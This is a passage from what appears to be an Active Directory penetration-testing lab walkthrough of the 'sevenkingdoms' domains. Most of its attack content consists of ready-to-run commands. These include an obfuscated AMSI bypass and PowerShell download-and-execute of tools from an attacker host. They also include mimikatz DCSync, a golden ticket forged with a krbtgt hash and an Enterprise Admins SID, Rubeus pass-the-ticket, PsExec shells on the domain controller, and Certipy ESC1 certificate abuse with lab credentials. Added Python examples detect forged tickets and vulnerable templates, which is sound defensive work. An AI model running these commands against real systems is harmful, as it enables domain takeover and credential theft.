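# Constructed scenario: a north ticket carrying the parent's Enterprise Admins SID
# (the golden ticket built with /sids on this page) plus one legitimate north SID.
INJECTED = f"{PARENT_SID}-{ENTERPRISE_ADMINS_RID}"
LEGIT = f"{NORTH_SID}-1105"

if __name__ == "__main__":
    for quarantine in (False, True):
        accepted, rejected = filter_extra_sids(NORTH_SID, [INJECTED, LEGIT], quarantine)
        print(f"quarantine={quarantine}: accepted={accepted} rejected={rejected} "
              f"enterprise_admin={grants_enterprise_admin(accepted, PARENT_SID)}")
```

Because a child domain is not a security boundary, the real fix is to treat the forest as the boundary and keep sensitive resources out of reach of domains you do not control, rather than relying on quarantine inside the forest.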


klist
We list the tickets in the session; we have impersonated the administrator user of the domain
sevenkingdoms.local.

dir \\KINGSLANDING.sevenkingdoms.local\C$
We list the DC's C$ share; access is confirmed.


iwr http://192.168.100.150/PsExec64.exe -O PsExec64.exe


.\PsExec64.exe -accepteula \\KINGSLANDING.sevenkingdoms.local powershell.exe
We get a powershell.exe console on the DC KINGSLANDING.sevenkingdoms.local.

Kerberos Golden Ticket


In this attack, the attacker forges a Kerberos ticket-granting ticket (a "Golden Ticket") using the
domain's KRBTGT key. The forged ticket lets the attacker authenticate as any user in the target
domain without knowing that user's actual credentials.

Bypass AMSI:
[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))
IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/PowerView.ps1')
Get-DomainSID -Domain north.sevenkingdoms.local

IEX (New-Object Net.WebClient).DownloadString('http://192.168.100.150/ADMap.ps1')


Get-TrustRelationship

S-1-5-21-656936499-3686200758-3068599609
Get-DomainGroup -Domain sevenkingdoms.local -Identity "Enterprise Admins"

objectsid: S-1-5-21-656936499-3686200758-3068599609-519


token::elevate
privilege::debug
lsadump::dcsync /domain:north.sevenkingdoms.local /all /csv

kerberos::golden /user:robb.stark /domain:north.sevenkingdoms.local /sid:S-1-5-21-2332039752-785340267-2377082902 /sids:S-1-5-21-656936499-3686200758-3068599609-519 /krbtgt:3f669715abb8fb5cada5f208d458e218 /ticket:ticket.kirbi
kerberos::golden: Indicates that a Golden Ticket attack is being performed using the Kerberos
functionality in Mimikatz.
/user:robb.stark: Specifies the username for which the Kerberos ticket is to be generated. In this
case, a ticket is being generated for the "robb.stark" user.
/domain:north.sevenkingdoms.local: Specifies the domain for which the Kerberos ticket is to be
generated. Here, the domain "north.sevenkingdoms.local" is indicated.
/sid:S-1-5-21-2332039752-785340267-2377082902: Provides the security identifier (SID) of the
domain. Each domain has a unique SID and this information is used in generating the Kerberos
ticket.
/sids:S-1-5-21-656936499-3686200758-3068599609-519: Specifies the additional SIDs to include
in the Kerberos ticket. These SIDs can represent security groups or other elements within the
domain.
/krbtgt:3f669715abb8fb5cada5f208d458e218: Provides the KRBTGT hash of the domain. KRBTGT is a
special service account in Active Directory used to encrypt and sign all Kerberos tickets in the
domain. The KRBTGT hash is crucial for generating a valid Kerberos ticket.
/ticket:ticket.kirbi: Specifies the path where the generated Kerberos ticket will be saved. In this
case, the ticket will be saved in a file named "ticket.kirbi".
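Added example, not from the guide: a Python triage of the golden-ticket parameters explained above (both the AES256 variant and the KRBTGT-hash variant), reporting what a defender would look for in such a forged TGT: SID history carrying a privileged RID from another domain, lifetimes beyond domain policy, and RC4 keying. The sample command is the one from this section; the RID table, policy defaults and helper names are this example's own.

```python
import re

# Added example (not the guide's code): triage a mimikatz kerberos::golden line as a defender would.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-(\d+))?$")

SAMPLE_COMMAND = (
    "kerberos::golden /user:robb.stark /domain:north.sevenkingdoms.local "
    "/sid:S-1-5-21-2332039752-785340267-2377082902 "
    "/sids:S-1-5-21-656936499-3686200758-3068599609-519 "
    "/krbtgt:3f669715abb8fb5cada5f208d458e218 /ticket:ticket.kirbi"
)

def parse_golden_args(command):
    """Turn the '/key:value' tokens into a dict; a flag without a value maps to ''."""
    args = {}
    for token in command.split()[1:]:
        key, _, value = token.lstrip("/").partition(":")
        args[key] = value
    return args

def split_sid(sid):
    """Return (domain SID, RID); RID is None when the value is a bare domain SID."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    rid = m.group(1)
    return (sid, None) if rid is None else (sid[: -(len(rid) + 1)], int(rid))

def analyze_golden_ticket(args, max_tgt_minutes=600, max_renew_minutes=10080):
    """Findings for a forged TGT; limits default to the default domain Kerberos policy (10 h / 7 d)."""
    findings = []
    ticket_domain, _ = split_sid(args["sid"])
    for sid in filter(None, args.get("sids", "").split(",")):
        sid_domain, rid = split_sid(sid)
        if sid_domain != ticket_domain and rid in PRIVILEGED_RIDS:
            # SID history naming a privileged group of another domain: the child-to-parent escalation
            findings.append(f"foreign privileged SID in SID history: {sid} ({PRIVILEGED_RIDS[rid]})")
    if int(args.get("endin", max_tgt_minutes)) > max_tgt_minutes:
        findings.append("ticket lifetime exceeds domain policy")
    if int(args.get("renew", max_renew_minutes)) > max_renew_minutes:
        findings.append("renewal lifetime exceeds domain policy")
    if "krbtgt" in args and "aes256" not in args:
        # /krbtgt: takes the NTLM hash, so the ticket is RC4-HMAC (etype 0x17), unusual in an AES domain
        findings.append("ticket keyed with the krbtgt NTLM hash (RC4-HMAC)")
    return findings

if __name__ == "__main__":
    print("\n".join(analyze_golden_ticket(parse_golden_args(SAMPLE_COMMAND))))
```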


iwr http://192.168.100.150/Ghostpack-CompiledBinaries/dotnet%20v4.5%20compiled%20binaries/Rubeus.exe -O Rubeus.exe
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist
dir \\KINGSLANDING.sevenkingdoms.local\C$

.\PsExec64.exe -accepteula \\KINGSLANDING.sevenkingdoms.local powershell.exe


cd c:\tmp
iwr http://192.168.100.150/mimi64.exe -O mimi64.exe
token::elevate
privilege::debug

lsadump::dcsync /domain:north.sevenkingdoms.local /all /csv


ADCS (ACTIVE DIRECTORY CERTIFICATE SERVICES)


This refers to weaknesses in Active Directory Certificate Services that an attacker can exploit to
compromise the infrastructure, for example by obtaining fraudulently issued certificates or
impersonating other identities.

We collect the ADCS information (CAs and templates) with Certipy and import it into BloodHound
(the ly4k fork, an older version that understands Certipy's output):

pip3 install certipy-ad


certipy-ad find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12

wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip -d BloodHound4.2-ly4k
BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound --no-sandbox --disable-dev-shm-usage
We import the .zip file into BloodHound (the Certipy queries are installed automatically).

certipy-ad req -u khal.drogo@essos.local -p 'horse' -target braavos.essos.local -template ESC1 -ca ESSOS-CA -upn administrator@essos.local
certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.12
export KRB5CCNAME=administrator.ccache
impacket-smbexec -k @braavos.essos.local -dc-ip 192.168.56.12
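Added example (not Certipy's code): an ESC1 pre-condition check over constructed template records, showing why a template like the lab's ESC1 accepts an arbitrary UPN in the request above and which single setting change closes it. The dict keys and principal lists are this example's own, not Certipy's JSON schema, and CA-level enrollment rights are assumed to be granted.

```python
# Added example (not Certipy's code): classify certificate templates for the ESC1 conditions that
# the "certipy-ad req ... -template ESC1 -upn administrator@essos.local" step abuses.
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

# Constructed sample templates using this example's own keys (not Certipy's JSON schema).
TEMPLATES = {
    "ESC1": {"enabled": True, "enrollee_supplies_subject": True,
             "ekus": ["Client Authentication"], "requires_manager_approval": False,
             "authorized_signatures_required": 0,
             "enrollment_rights": ["Domain Users", "Domain Admins"]},
    "User": {"enabled": True, "enrollee_supplies_subject": False,
             "ekus": ["Client Authentication", "Secure Email"], "requires_manager_approval": False,
             "authorized_signatures_required": 0,
             "enrollment_rights": ["Domain Users"]},
}

def esc1_conditions(template):
    """Each ESC1 precondition as a boolean; the template is abusable only if all of them hold."""
    ekus = set(template.get("ekus", []))
    return {
        "published_by_ca": bool(template.get("enabled", False)),
        # Requester chooses the subject, so it can ask for a UPN such as administrator@essos.local
        "enrollee_supplies_subject": bool(template.get("enrollee_supplies_subject", False)),
        # A template with no EKU at all also permits client authentication
        "client_auth_eku": not ekus or bool(ekus & CLIENT_AUTH_EKUS),
        "no_manager_approval": not template.get("requires_manager_approval", False),
        "no_authorized_signatures": template.get("authorized_signatures_required", 0) == 0,
        "low_priv_enrollment": bool(LOW_PRIV_PRINCIPALS & set(template.get("enrollment_rights", []))),
    }

def is_esc1(template):
    return all(esc1_conditions(template).values())

def blocking_conditions(template):
    """Preconditions that are NOT met, i.e. what currently protects the template. For a vulnerable
    template this is empty; changing any one setting (e.g. requiring manager approval) closes ESC1."""
    return [name for name, met in esc1_conditions(template).items() if not met]

if __name__ == "__main__":
    for name, tpl in TEMPLATES.items():
        print(name, "ESC1" if is_esc1(tpl) else "not ESC1", blocking_conditions(tpl))
```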


Thank you very much!
